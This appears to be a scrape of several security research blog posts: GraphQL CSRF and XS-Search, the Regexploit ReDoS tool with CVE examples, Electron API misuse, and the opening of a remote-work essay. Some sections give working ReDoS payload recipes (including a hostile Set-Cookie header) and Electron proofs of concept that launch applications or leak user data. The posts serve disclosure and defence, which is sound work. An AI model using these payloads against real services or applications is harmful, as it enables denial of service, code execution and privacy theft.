urlpatterns = patterns(
    # ...
    url(r'^graphql', csrf_exempt(GraphQLView.as_view(graphiql=True))),
    # ...
)

CSRF: Better Safe Than Sorry

Some browsers, such as Chrome, recently defaulted cookie behavior to be equivalent to SameSite=Lax, which protects from the most common CSRF vectors.

Other prevention methods can be implemented within each application. The most common are:

Built-in CSRF protection in modern frameworks
Origin verification
Double submit cookies
User interaction based protection
Not using GET requests for state-changing operations
Extending CSRF protection to GET requests too

There isn’t necessarily a single best option for every application. Determining the best protection requires evaluating the specific environment on a case-by-case basis.
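
As an illustration of how a few of these measures combine, here is a minimal, framework-agnostic Python sketch of a pre-resolver check. Everything in it is an assumption made for the example: the function name, the ALLOWED_ORIGINS value, and the idea that the caller already knows whether the operation is a mutation. It covers origin verification, strict content-type handling and the ban on state changes over GET; it is not a replacement for a framework's built-in CSRF protection.

```python
from urllib.parse import urlsplit

ALLOWED_ORIGINS = {"https://app.example.com"}  # hypothetical trusted origin
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def origin_of(url: str):
    """Return scheme://host[:port] for a URL, or None if it cannot be determined."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def is_graphql_request_allowed(method: str, headers: dict, is_mutation: bool) -> bool:
    method = method.upper()
    lowered = {name.lower(): value for name, value in headers.items()}

    # Never let a state-changing operation through a safe HTTP method.
    if method in SAFE_METHODS:
        return not is_mutation
    if method != "POST":
        return False

    # Accept JSON only, so that plain HTML forms cannot reach the resolver.
    content_type = lowered.get("content-type", "").split(";")[0].strip().lower()
    if content_type != "application/json":
        return False

    # Origin verification, falling back to Referer when Origin is absent.
    source = lowered.get("origin") or lowered.get("referer")
    if source is None:
        return False
    return origin_of(source) in ALLOWED_ORIGINS


print(is_graphql_request_allowed(
    "POST",
    {"Content-Type": "application/x-www-form-urlencoded", "Origin": "https://evil.example"},
    True,
))
```

Note that this sketch does nothing for state-changing operations that are wrongly exposed as queries; those still need to be found and moved to mutations.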

Rumbling The XS-Search

In XS-Search attacks, an attacker leverages a CSRF vulnerability to force a victim to request data the attacker can’t access themselves. The attacker then compares response times to infer whether the request was successful or not.

For example, if there is a CSRF vulnerability in the file search function and the attacker can make the admin visit that page, they could make the victim search for filenames starting with specific values, to confirm their existence or accessibility.

Applications which accept GET requests for complex urlencoded queries and demonstrate a general misunderstanding of CSRF protection on their GraphQL endpoints represent the perfect target for XS-Search attacks.
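
The enumeration logic behind such an attack is simple, as the following Python sketch shows. It deliberately uses a simulated yes/no oracle over a made-up file list; in a real XS-Search scenario that answer would have to be inferred from cross-origin timing measurements, which are not modeled here. The names recover_by_prefix, simulated_oracle and SECRET_FILES are hypothetical.

```python
import string

SECRET_FILES = {"budget.pdf", "backup.zip"}  # made-up data for the simulation
ALPHABET = string.ascii_lowercase + string.digits + "."


def simulated_oracle(prefix: str) -> bool:
    """Stand-in for 'did the victim's search for this prefix return results?'."""
    return any(name.startswith(prefix) for name in SECRET_FILES)


def recover_by_prefix(oracle, alphabet: str, max_len: int):
    """Recover all maximal strings for which the oracle confirms every prefix."""
    found = []
    frontier = [""]
    while frontier:
        prefix = frontier.pop()
        extended = False
        for ch in alphabet:
            candidate = prefix + ch
            if len(candidate) <= max_len and oracle(candidate):
                frontier.append(candidate)
                extended = True
        # A confirmed prefix that cannot be extended is a complete value.
        if prefix and not extended:
            found.append(prefix)
    return sorted(found)


print(recover_by_prefix(simulated_oracle, ALPHABET, max_len=16))
```

Each oracle call corresponds to one forced request, so the cost grows with the alphabet size times the length of the recovered values rather than with the size of the whole search space.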

XS-Search is quite a neat and simple technique which can transform the following query into an attacker-controlled binary search (e.g. we can enumerate the users of a private platform):

query {
	isEmailAvailable(email:"foo@bar.com") {
		is_email_available
	}
}

In HTTP GET form:

GET /graphql?query=query+%7B%0A%09isEmailAvailable%28email%3A%22foo%40bar.com%22%29+%7B%0A%09%09is_email_available%0A%09%7D%0A%7D HTTP/1.1
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Host: redacted
Content-Length: 0
Content-Type: application/json
Cookie: ...

The implications of a successful XS-Search attack on a GraphQL endpoint cannot be overstated. However, as previously mentioned, CSRF-based issues can be successfully mitigated with some effort.

Automate Everything!!!

As much as we love finding bugs the hard way, we believe that automation is the only way to democratize security and provide the best service to the community.

For this reason and in conjunction with this research, we are releasing a new major version of our GraphQL InQL Burp extension.

InQL v4 can assist in detecting these issues:

By identifying various classes of CSRF through new “Send to Repeater” helpers:
- GET query parameters
- POST form-data
- POST x-form-urlencoded
By improving the query generation

Something for our beloved number crunchers!

We tested for the aforementioned vulnerabilities in some of the top companies that make use of GraphQL. While the research on these ~30 endpoints lasted only two days, and neither conclusiveness nor completeness should be inferred, the numbers show an impressive number of unpatched vulnerabilities:

14 (~50%) were vulnerable to some kind of XS-Search, equivalent to a GET-based CSRF
3 (~10%) were vulnerable to CSRF

TL;DR: Cross Site Request Forgery is here to stay for a few more years, even if you use GraphQL!

Regexploit: DoS-able Regular Expressions

2021-03-11T00:00:00+01:00

When thinking of Denial of Service (DoS), we often focus on Distributed Denial of Service (DDoS) where millions of zombie machines overload a service by launching a tsunami of data. However, by abusing the algorithms a web application uses, an attacker can bring a server to its knees with as little as a single request. Doing that requires finding algorithms which have terrible performance under certain conditions, and then triggering those conditions. One widespread and frequently vulnerable area is in the misuse of regular expressions (regexes).

Regular expressions are used for all manner of text-processing tasks. They may seem to run fine, but if a regex is vulnerable to Regular Expression Denial of Service (ReDoS), it may be possible to craft input which causes the CPU to run at 100% for years.

In this blog post, we’re releasing a new tool to analyse regular expressions and hunt for ReDoS vulnerabilities. Our heuristic has been proven to be extremely effective, as demonstrated by many vulnerabilities discovered across popular NPM, Python and Ruby dependencies.

Check your regexes with Regexploit

🚀 @doyensec/regexploit - pip install regexploit and find some bugs.

Backtracking

To get into the topic, let’s review how the regex matching engines in languages like Python, Perl, Ruby, C# and JavaScript work. Let’s imagine that we’re using this deliberately silly regex to extract version numbers:

(.+)\.(.+)\.(.+)

That will correctly process something like 123.456.789, but it’s a pretty inefficient regex. How does the matching process work?

The first .+ capture group greedily matches all the way to the end of the string, as dot matches every character.

$1="123.456.789". The matcher then looks for a literal dot character. Unable to find it, it tries removing one character at a time from the first .+ until it successfully matches a dot - $1="123.456"

The second capture group matches the final three digits $2="789", but we need another dot so it has to backtrack.

Hmmm… it seems that maybe the match for capture group 1 is incorrect, let’s try backtracking.

OK let’s try with $1="123", and let’s match group 2 greedily all the way to the end.

$2="456.789" but now there’s no dot! That can’t be the correct group 2…

Finally we have a successful match: $1="123", $2="456", $3="789"

As you can hopefully see, there can be a lot of back-and-forth in the regex matching process. This backtracking is due to the ambiguous nature of the regex, where input can be matched in different ways. If a regex isn’t well-designed, malicious input can cause a much more resource-intensive backtracking loop than this.
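
The end result of the walk-through can be checked directly in Python. The stricter pattern in the sketch below is our own suggested alternative rather than something taken from a real code base; it captures the same groups while leaving the engine far less room for ambiguity, because a digit can never be confused with a dot.

```python
import re

# The deliberately silly pattern from the walk-through.
SILLY_RE = re.compile(r"(.+)\.(.+)\.(.+)")

# A less ambiguous alternative (an assumption about what versions look like).
STRICT_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")

silly_groups = SILLY_RE.match("123.456.789").groups()
strict_groups = STRICT_RE.match("123.456.789").groups()

print(silly_groups)
print(strict_groups)
```

Both patterns extract the same three groups from this input; the difference only shows in how much backtracking is needed to get there, and in how the engine behaves on input that does not match.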

If backtracking takes an extreme amount of time, it will cause a Denial of Service, such as what happened to Cloudflare in 2019. In runtimes like NodeJS, the Event Loop will be blocked which stalls all timers, awaits, requests and responses until regex processing completes.

ReDoS example

Now we can look at a ReDoS example. The ua-parser package contains a giant list of regexes for deciphering browser User-Agent headers. One of the regular expressions reported in CVE-2020-5243 was:

; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)

If we look closer at the end part we can see three overlapping repeating groups:

\d+[^\);]+[^\);]*\)

Digit characters are matched by \d and by [^\);]. If a string of N digits enters that section, there are ½(N-1)N possible ways to split it up between the \d+, [^\);]+ and [^\);]* groups. The key to causing ReDoS is to supply input which doesn’t successfully match, such as by not ending our malicious input with a closing parenthesis. The regex engine will backtrack and try all possible ways of matching the digits in the hope of then finding a ).
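
The ½(N-1)N figure can be verified with a short brute-force count. The sketch below simply enumerates how many digits go to each of the three repeating groups, given that the first two must take at least one digit and the third may take none; the function name count_splits is ours.

```python
def count_splits(n: int) -> int:
    """Count the ways to split n digits between \\d+, [^\\);]+ and [^\\);]*."""
    count = 0
    for first in range(1, n + 1):               # \d+ takes at least one digit
        for second in range(1, n - first + 1):  # [^\);]+ takes at least one
            # The remaining n - first - second digits (possibly zero)
            # go to [^\);]*, so each (first, second) pair is one split.
            count += 1
    return count


for n in (2, 3, 10, 100):
    print(n, count_splits(n), n * (n - 1) // 2)
```

Since the engine also has to scan the remaining digits for each of these splits before giving up, the total work grows roughly with the cube of N.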

This visualisation of the matching steps was produced by emitting verbose debugging from cpython’s regex engine using my cpython fork.

Regexploit

Today, we are releasing a tool called Regexploit to extract regexes from code, scan them and find ReDoS.

Several tools already exist to find regexes with exponential worst case complexity (regexes of the form (a+)+b), but cubic complexity regexes (a+a+a+b) can still be damaging. Regexploit walks through the regex and tries to find ambiguities where a single character could be captured by multiple repeating parts. Then it looks for a way to make the regular expression not match, so that the regex engine has to backtrack.

The regexploit script allows you to enter regexes via stdin. If the regex looks OK it will say “No ReDoS found”. With the regex above it shows the vulnerability:

Worst-case complexity: 3 ⭐⭐⭐ (cubic)
Repeated character: [[0-9]]
Example: ';0 Build/HuaweiA' + '0' * 3456

The final line of output gives a recipe for creating a User-Agent header which will cause ReDoS on sites using old versions of ua-parser, likely resulting in a Bad Gateway error.

User-Agent: ;0 Build/HuaweiA0000000000000000000000000000...
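To see the recipe in action without taking a machine down, the payload can be built with a small repeat count and fed to the regex directly. This is only a sketch: the regex is copied from the listing above, while make_payload, time_search and the sample "foo" User-Agent fragment are illustrative names and values of our own.

```python
import re
import time

# Regex copied from the CVE-2020-5243 listing above
HUAWEI_RE = re.compile(
    r"; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)"
)


def make_payload(n: int) -> str:
    """Build the Regexploit example string with n repeated digits."""
    return ";0 Build/HuaweiA" + "0" * n


def time_search(n: int) -> float:
    """Return the seconds spent failing to match a payload of n digits."""
    start = time.perf_counter()
    result = HUAWEI_RE.search(make_payload(n))
    elapsed = time.perf_counter() - start
    assert result is None  # the payload never ends with ')', so no match
    return elapsed


# A well-formed (made-up) fragment still matches straight away
ok = HUAWEI_RE.search("; foo Build/HuaweiG610-U00)")
print(ok.group(1), ok.group(2))

# Keep n small: the cost grows roughly with n**3
for n in (50, 100, 200):
    print(n, f"{time_search(n):.4f}s")
```

Doubling n should multiply the time by roughly eight, which is why a few thousand digits are enough to stall a worker.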

To scan your source code, there is built-in support for extracting regexes from Python, JavaScript, TypeScript, C#, JSON and YAML. If you are able to extract regexes from other languages, they can be piped in and analysed.

Once a vulnerable regular expression is found, it does still require some manual investigation. If it’s not possible for untrusted input to reach the regular expression, then it likely does not represent a security issue. In some cases, a prefix or suffix might be required to get the payload to the right place.

ReDoS Survey

So what kind of ReDoS issues are out there? We used Regexploit to analyse the top few thousand npm and pypi libraries (grabbed from the libraries.io API) to find out.

We tried to exclude build tools and test frameworks, as bugs in these are unlikely to have any security impact. When a vulnerable regex was found, we then needed to figure out how untrusted input could reach it.

Results

The most problematic area was the use of regexes to parse programming or markup languages. Using regular expressions to parse some languages e.g. Markdown, CSS, Matlab or SVG is fraught with danger. Such languages have grammars which are designed to be processed by specialised lexers and parsers. Trying to perform the task with regexes leads to overly complicated patterns which are difficult for mere mortals to read.

A recurring source of vulnerabilities was the handling of optional whitespace. As an example, let’s take the Python module CairoSVG which used the following regex:

rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)

$ regexploit-py .env/lib/python3.9/site-packages/cairosvg/
Vulnerable regex in .env/lib/python3.9/site-packages/cairosvg/colors.py #190
Pattern: rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)
Context: RGBA = re.compile(r'rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)')
---
Starriness: 3 ⭐⭐⭐ (cubic)
Repeated character: [20,09,0a,0d]
Example: 'rgba(' + ' ' * 3456

The developer wants to find strings like rgba( 100,200, 10, 0.5 ) and extract the middle part without surrounding spaces. Unfortunately, the .+ in the middle also accepts spaces. If the string does not end with a closing parenthesis, the regex will not match, and we can get O(n³) backtracking.

Let’s take a look at the matching process with the input "rgba(" + " " * 19:

What a load of wasted CPU cycles!

A fun ReDoS bug was discovered in cpython’s http.cookiejar with this gorgeous regex:

Pattern: ^
    (\d\d?)            # day
       (?:\s+|[-\/])
    (\w+)              # month
        (?:\s+|[-\/])
    (\d+)              # year
    (?:
          (?:\s+|:)    # separator before clock
       (\d\d?):(\d\d)  # hour:min
       (?::(\d\d))?    # optional seconds
    )?                 # optional clock
       \s*
    ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
       \s*
    (?:\(\w+\))?       # ASCII representation of timezone in parens.
       \s*$
Context: LOOSE_HTTP_DATE_RE = re.compile(
---
Starriness: 3 ⭐⭐⭐
Repeated character: [SPACE]
Final character to cause backtracking: [^SPACE]
Example: '0 a 0' + ' ' * 3456 + '0'

It was used when processing cookie expiry dates like Fri, 08 Jan 2021 23:20:00 GMT, but with compatibility for some deprecated date formats. The last 5 lines of the regex pattern contain three \s* groups separated by optional groups, so we have a cubic ReDoS.

A victim simply making an HTTP request like requests.get('http://evil.server') could be attacked by a remote server responding with Set-Cookie headers of the form:

Set-Cookie: b;Expires=1-c-1                        X

With the maximum 65506 spaces that can be crammed into an HTTP header line in Python, the client will take over a week to finish processing the header.
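The cubic growth is easy to observe on a much smaller scale. The sketch below compiles the pattern exactly as listed above and times it against the Regexploit example string rather than a real header. The re.X | re.ASCII flags, the helper names and the weekday-free sample date are assumptions made for this illustration.

```python
import re
import time

# Pattern as listed above; the flags are an assumption for this sketch
LOOSE_HTTP_DATE_RE = re.compile(
    r"""^
    (\d\d?)            # day
       (?:\s+|[-\/])
    (\w+)              # month
        (?:\s+|[-\/])
    (\d+)              # year
    (?:
          (?:\s+|:)    # separator before clock
       (\d\d?):(\d\d)  # hour:min
       (?::(\d\d))?    # optional seconds
    )?                 # optional clock
       \s*
    ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
       \s*
    (?:\(\w+\))?       # ASCII representation of timezone in parens.
       \s*$""",
    re.X | re.ASCII,
)


def payload(n: int) -> str:
    """Regexploit's example: n spaces followed by a non-space character."""
    return "0 a 0" + " " * n + "0"


def seconds_to_reject(n: int) -> float:
    """Time how long the regex needs to give up on a payload of n spaces."""
    start = time.perf_counter()
    result = LOOSE_HTTP_DATE_RE.search(payload(n))
    elapsed = time.perf_counter() - start
    assert result is None  # the trailing '0' prevents a match
    return elapsed


# A date without the weekday prefix is still parsed normally
valid = LOOSE_HTTP_DATE_RE.search("08 Jan 2021 23:20:00 GMT")
print(valid.groups())

# Small values only: each doubling costs roughly eight times more
for n in (40, 80, 160):
    print(n, f"{seconds_to_reject(n):.4f}s")
```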

Again, the issue was designing the regex to handle whitespace between optional sections.

Another point to notice is that, based on the git history, the troublesome regexes we discovered had mostly remained untouched since they first entered the codebase. While it shows that the regexes seem to cause no issues in normal conditions, it perhaps indicates that regexes are too illegible to maintain. If the regex above had no comments to explain what it was supposed to match, who would dare try to alter it? Probably only the guy from xkcd.

Sorry, I wanted to shoehorn this comic in somewhere

Mitigations - Safety first

Use a DFA

So why didn’t I bother looking for ReDoS in Golang? Go’s regex engine re2 does not backtrack.

Its design (Deterministic Finite Automaton) was chosen to be safe even if the regular expression itself is untrusted. The guarantee is that regex matching will occur in linear time regardless of input. There was a trade-off though. Depending on your use-case, libraries like re2 may not be the fastest engines. There are also some regex features such as backreferences which had to be dropped. But in the pathological case, regexes won’t be what takes down your website. There are re2 libraries for many languages, so you can use it in preference to Python’s re module.

Don’t do it all with regexes

For the whitespace ambiguity issue, it’s often possible to first use a simple regex and then trim / strip the spaces from either side of the result.
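As a rough illustration using the rgba example from earlier, the whitespace handling can be moved out of the regex entirely. This is a sketch of the idea and not the fix that CairoSVG shipped: the pattern and the extract_rgba_args helper are hypothetical, and unlike the original .+? this pattern also accepts an empty or multi-line argument list.

```python
import re

# Hypothetical replacement: capture everything up to the first ')'
# and leave the whitespace handling to str.strip()
SIMPLE_RGBA = re.compile(r"rgba\(([^)]*)\)")


def extract_rgba_args(text: str):
    """Return the trimmed contents of rgba(...), or None if there is no match."""
    match = SIMPLE_RGBA.search(text)
    if match is None:
        return None
    return match.group(1).strip(" \n\r\t")


print(extract_rgba_args("rgba( 100,200, 10, 0.5 )"))
# The former ReDoS payload is now rejected in linear time
print(extract_rgba_args("rgba(" + " " * 100_000))
```

There is only one repeating group left, so a failed match has nothing ambiguous to backtrack over.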

Many tiny regexes

In Ruby, the standard library contains StringScanner which helps with “lexical scanning operations”. While the http-cookie gem has many more lines of code than a mega-regex, it avoids ReDoS when parsing Set-Cookie headers. Once each part of the string has been matched, it refuses to backtrack. In some regular expression flavours, you can use “possessive quantifiers” to mark sections as non-backtrackable and achieve a similar effect.
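The same approach can be sketched in Python with a handful of tiny patterns and a cursor that only ever moves forward. The Scanner class below is a hypothetical stand-in for Ruby's StringScanner, and parse_attributes is a deliberately simplified attribute splitter of our own, not a port of the http-cookie gem.

```python
import re


class Scanner:
    """Tiny StringScanner-like helper that consumes input left to right."""

    def __init__(self, text: str):
        self.text = text
        self.pos = 0

    def scan(self, pattern):
        """Match at the current position; advance and return the text, else None."""
        match = pattern.match(self.text, self.pos)
        if match is None:
            return None
        self.pos = match.end()  # consumed input is never revisited
        return match.group(0)

    def eos(self) -> bool:
        return self.pos >= len(self.text)


# Many tiny regexes, each with a single unambiguous job
WS = re.compile(r"[ \t]*")
NAME = re.compile(r"[^=;\s]+")
EQUALS = re.compile(r"=")
VALUE = re.compile(r"[^;]*")
SEMI = re.compile(r";")


def parse_attributes(header_value: str):
    """Split 'name=value; flag; ...' into (name, value) pairs."""
    scanner = Scanner(header_value)
    pairs = []
    while not scanner.eos():
        scanner.scan(WS)
        name = scanner.scan(NAME)
        if name is None:
            break
        value = ""
        if scanner.scan(EQUALS) is not None:
            value = scanner.scan(VALUE).strip()
        pairs.append((name, value))
        scanner.scan(WS)
        if scanner.scan(SEMI) is None:
            break
    return pairs


print(parse_attributes("b=1; Expires=Fri, 08 Jan 2021 23:20:00 GMT; Secure"))
```

Because the cursor never moves backwards, a header stuffed with tens of thousands of spaces is processed in a single pass.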

Gotta catch ‘em all 🐛🐞🦠

CVE-2020-5243: uap-core affecting uap-python, uap-ruby, etc. (User-Agent header parsing)
CVE-2020-8492: cpython’s urllib.request (WWW-Authenticate header parsing)
CVE-2021-21236: CairoSVG (SVG parsing)
CVE-2021-21240: httplib2 (WWW-Authenticate header parsing)
CVE-2021-25292: python-pillow (PDF parsing)
CVE-2021-26813: python-markdown2 (Markdown parsing)
CVE-2021-27290: npm/ssri (SRI parsing)
CVE-2021-27291: pygments lexers for ADL, CADL, Ceylon, Evoque, Factor, Logos, Matlab, Octave, ODIN, Scilab & Varnish VCL (Syntax highlighting)
CVE-2021-27292: ua-parser-js (User-Agent header parsing)
CVE-2021-27293: RestSharp (JSON deserialisation in a .NET C# package)
bpo-38804: cpython’s http.cookiejar (Set-Cookie header parsing)
SimpleCrawler (archived) (HTML parsing)
CVE-2021-28092: to be released
Plus many more unpublished bugs in a handful of pypi, npm, ruby and nuget packages. We will update this list on https://github.com/doyensec/regexploit

Electron APIs Misuse: An Attacker’s First Choice

2021-02-16T00:00:00+01:00

ElectronJs is getting more secure every day. Context isolation and other security settings are planned to become enabled by default with the upcoming release of Electron 12 stable, seemingly ending the somewhat deserved reputation of a systemically insecure framework.

Seeing such significant and tangible progress makes us proud. Over the past years we’ve committed to helping developers secure their applications by researching different attack surfaces.

As confirmed by the Electron development team in the v11 stable release, they plan to release new major versions of Electron (including new versions of Chromium, Node, and V8) approximately quarterly. Such an ambitious versioning schedule will also increase the number and frequency of newly introduced APIs, planned breaking changes, and consequent security nuances in upcoming versions. While new functionality is certainly desirable, new framework APIs may also expose powerful interfaces to OS features, which may be more or less inadvertently enabled by developers falling for the syntactic sugar provided by Electron.

Such interfaces may be exposed to the renderer, either through preloads or insecure configurations, and can be abused by an attacker beyond their original purpose. An infamous example of this is openExternal.

Shell’s openExternal() allows opening a given external protocol URI with the desktop’s native utilities. For instance, on macOS, this function is similar to the open terminal command and will open the specific application based on the URI and file type association. When openExternal is used with untrusted content, it can be leveraged to execute arbitrary commands, as demonstrated by the following example:

const {shell} = require('electron') 
shell.openExternal('file:///System/Applications/Calculator.app')

Similarly, shell.openPath(path) can be used to open the given file in the desktop’s default manner.

From an attacker’s perspective, Electron-specific APIs are very often the easiest path to gain remote code execution, read or write access to the host’s filesystem, or leak sensitive user data. Malicious JavaScript running in the renderer can often subvert the application using such primitives.

With this in mind, we gathered a non-comprehensive list of APIs we successfully abused during our past engagements. When exposed to the user in the renderer, these APIs can significantly affect the security posture of Electron-based applications and facilitate nodeIntegration / sandbox bypasses.

Remote.app

The remote module provides a way for the renderer processes to access APIs normally only available in the main process. In Electron, GUI-related modules (such as dialog, menu, etc.) are only available in the main process, not in the renderer process. In order to use them from the renderer process, the remote module is necessary to send inter-process messages to the main process.

While this seems pretty useful, this API has been a source of performance and security troubles for quite a while. As a result of that, the remote module will be deprecated in Electron 12, and eventually removed in Electron 14.

Despite the warnings and numerous articles on the topic, we have seen a few applications exposing Remote.app to the renderer. The app object controls the full application’s event lifecycle and it is basically the heart of every Electron-based application.

Many of the functions exposed by this object can be easily abused, including but not limited to:

app.relaunch([options]) Relaunches the app when current instance exits.
app.setAppLogsPath([path]) Sets or creates a directory for your app’s logs, which can then be manipulated with app.getPath() or app.setPath(pathName, newPath).
app.setAsDefaultProtocolClient(protocol[, path, args]) Sets the current executable as the default handler for a specified protocol.
app.setUserTasks(tasks) Adds tasks to the Tasks category of the Jump List (Windows only).
app.importCertificate(options, callback) Imports the certificate in pkcs12 format into the platform certificate store (Linux only).
app.moveToApplicationsFolder([options]) Moves the application to the default Applications folder (Mac only).
app.setJumpList(categories) Sets or removes a custom Jump List for the application (Windows only).
app.setLoginItemSettings(settings) Sets executables to launch at login with their options (Mac, Windows only).

Taking the first function as an example, app.relaunch([options]) can be used to relaunch the app when the current instance exits. Using this primitive, it is possible to specify a set of options, including an execPath property that will be executed for relaunch instead of the current app, along with a custom args array that will be passed as command-line arguments. This functionality can be easily leveraged by an attacker to execute arbitrary commands.

Native.app.relaunch({args: [], execPath: "/System/Applications/Calculator.app/Contents/MacOS/Calculator"});
Native.app.exit()

Note that the relaunch method alone does not quit the app when executed, and it is also necessary to call app.quit() or app.exit() after calling the method to make the app restart.

systemPreferences

Another frequently exported module is systemPreferences. This API is used to get the system preferences and emit system events, and can therefore be abused to leak multiple pieces of information on the user’s behavior and their operating system activity and usage patterns. The metadata extracted through the module could then be abused to mount targeted attacks.

subscribeNotification, subscribeWorkspaceNotification

These methods could be used to subscribe to native macOS notifications. Under the hood, this API subscribes to NSDistributedNotificationCenter. Before macOS Catalina, it was possible to register a global listener and receive all distributed notifications by invoking the CFNotificationCenterAddObserver function with nil for the name parameter (corresponding to the event parameter of subscribeNotification). The specified callback would be invoked any time a distributed notification was broadcast by any app. Following the release of macOS Catalina and Big Sur, it is still possible for sandboxed applications to globally sniff distributed notifications by registering to receive any notification by name. As a result, many sensitive events can be sniffed, including but not limited to:

Screen locks/unlocks
Screen saver start/stop
Bluetooth activity/HID Devices
Volume (USB, etc) mount/unmount
Network activity
User file downloads
Newly Installed Applications
Opened Source Code Files
Applications in Use
Loaded Kernel Extensions
…and more from installed applications, including any sensitive information placed in them. Distributed notifications are always public by design, and it was never correct to put sensitive information in them.

The latest NSDistributedNotificationCenter API also seems to be having intermittent problems with Big Sur and sandboxed applications, so we expect to see more breaking changes in the future.

getUserDefault, setUserDefault

The getUserDefault function returns the value of key in NSUserDefaults, a simple macOS storage class that provides a programmatic interface for interacting with the defaults system. This systemPreferences method can be abused to return the Application’s or Global’s Preferences. An attacker may abuse the API to retrieve sensitive information including the user’s location and filesystem resources. As a demonstration, getUserDefault can be used to obtain personal details of the targeted application user:

User’s most recent locations on the file system

> Native.systemPreferences.getUserDefault("NSNavRecentPlaces","array")
(5) ["/tmp/secretfile", "/tmp/SecretResearch", "~/Desktop/Cellar/NSA_files", "/tmp/blog.doyensec.com/_posts", "~/Desktop/Invoices"]

User’s selected geographic location

> Native.systemPreferences.getUserDefault("com.apple.TimeZonePref.Last_Selected_City","array")
(10) ["48.40311", "11.74905", "0", "Europe/Berlin", "DE", "Freising", "Germany", "Freising", "Germany", "DEPRECATED IN 10.6"]

Complementarily, the setUserDefault method can be weaponized to set the user defaults for the Application Preferences related to the target application. Before Electron v8.3.0 [1], [2] these methods could only get or set NSUserDefaults keys in the standard suite.

Shell.showItemInFolder

A subtle example of a potentially dangerous native Electron primitive is shell.showItemInFolder. As the name suggests, this API shows the given file in a file manager.

Such seemingly innocuous functionality hides some peculiarities that could be dangerous from a security perspective.

On Linux (/shell/common/platform_util_linux.cc), Electron extracts the parent directory name, checks if the resulting path is actually a directory and then uses XDGOpen (xdg-open) to show the file in its location:

void ShowItemInFolder(const base::FilePath& full_path) {
  base::FilePath dir = full_path.DirName();
  if (!base::DirectoryExists(dir))
    return;

  XDGOpen(dir.value(), false, platform_util::OpenCallback());
}

xdg-open can be leveraged for executing applications on the victim’s computer.

“If a file is provided the file will be opened in the preferred application for files of that type” (https://linux.die.net/man/1/xdg-open)

Because of the inherent time-of-check to time-of-use (TOCTOU) condition caused by the time difference between the directory existence check and its launch with xdg-open, an attacker could run an executable of choice by replacing the folder path with an arbitrary file, winning the race introduced by the check. While this issue is rather tricky to exploit in the context of an insecure Electron renderer, it is certainly a potential step in a more complex vulnerability chain.
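The check-then-use pattern can be simulated safely. The Python sketch below mirrors the shape of the Linux code path (take the parent directory, check that it exists, then hand it to an opener), but everything in it is hypothetical: describe merely stands in for xdg-open and reports what it was handed, and the between_check_and_use hook plays the attacker winning the race at exactly the right moment.

```python
import os
import tempfile


def show_item_in_folder(full_path, opener, between_check_and_use=lambda: None):
    """Mimic the check-then-open flow and return whatever the opener reports."""
    parent = os.path.dirname(full_path)
    if not os.path.isdir(parent):   # time of check
        return None
    between_check_and_use()         # hypothetical hook: the attacker's window
    return opener(parent)           # time of use


def describe(path):
    """Stand-in for xdg-open: only report what kind of object it was given."""
    return "directory" if os.path.isdir(path) else "file"


with tempfile.TemporaryDirectory() as root:
    target_dir = os.path.join(root, "docs")
    os.mkdir(target_dir)
    item = os.path.join(target_dir, "report.txt")

    def swap():
        # Replace the checked directory with a regular file of the same name
        os.rmdir(target_dir)
        with open(target_dir, "w") as fh:
            fh.write("#!/bin/sh\n")

    benign = show_item_in_folder(item, describe)
    raced = show_item_in_folder(item, describe, swap)

print(benign, raced)
```

In the raced call the existence check passes on a directory, yet the opener ends up receiving a file, which is the situation the paragraph above describes.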

On Windows (/shell/common/platform_util_win.cc), the situation is even more tricky:

void ShowItemInFolderOnWorkerThread(const base::FilePath& full_path) {
...
  base::win::ScopedCoMem<ITEMIDLIST> dir_item;
  hr = desktop->ParseDisplayName(NULL, NULL,
                                 const_cast<wchar_t*>(dir.value().c_str()),
                                 NULL, &dir_item, NULL);

  const ITEMIDLIST* highlight[] = {file_item};
  hr = SHOpenFolderAndSelectItems(dir_item, base::size(highlight), highlight,
                                  NULL);
...
  if (FAILED(hr)) {
    if (hr == ERROR_FILE_NOT_FOUND) {
      ShellExecute(NULL, L"open", dir.value().c_str(), NULL, NULL, SW_SHOW);
    } else {
      LOG(WARNING) << " " << __func__ << "(): Can't open full_path = \""
                   << full_path.value() << "\""
                   << " hr = " << logging::SystemErrorCodeToString(hr);
    }
  }
}

Under normal circumstances, the SHOpenFolderAndSelectItems Windows API (from shlobj_core.h) is used. However, Electron introduced a fallback mechanism as the call mysteriously fails with a “file not found” exception on old Windows systems. In these cases, ShellExecute is used as a fallback, specifying “open” as the lpVerb parameter. According to the Windows Shell documentation, the “open” object verb launches the specified file or application. If this file is not an executable file, its associated application is launched.

While the exploitability of these quirks is up for discussion, these examples showcase how innocuous APIs might introduce OS-dependent security risks. In fact, Chromium has refactored the code in question to avoid the use of xdg-open altogether and leverage dbus instead.

The Electron APIs illustrated in this blog post are just a few notable examples of potentially dangerous primitives that are available in the framework. As Electron becomes more and more integrated with all supported operating systems, we expect this list to grow over time. As we often repeat, know your framework (and its limitations) and adopt defense-in-depth mechanisms to mitigate such deficiencies.

As a company, we will continue to devote our 25% research time to securing the ElectronJS ecosystem and improving Electronegativity.

Psychology of Remote Work

2020-12-17T00:00:00+01:00

This is the first in a series of non-technical blog posts aiming at discussing the opportunities and challenges that arise when running a small information security consulting company. After all, day to day life at Doyensec is not only about computers and stories of breaking bits.

The pandemic has deeply affected standard office work and forced us to immediately change our habits. In all probability, no one could have predicted that the office would suddenly be “moved” and that its new location would be the living room. Remote work has been a hot topic for many years; however, the current situation has certainly accelerated its adoption and forced companies to make a change.

At Doyensec, we’ve been a 100% remote company since day one. In this blog post, we’d like to present our best practices and also list some of the myths which surround the idea of remote work. This article is based on our personal experience and will hopefully help the reader to work at home more efficiently. There are no magic recipes here, just a collection of things that work for us.

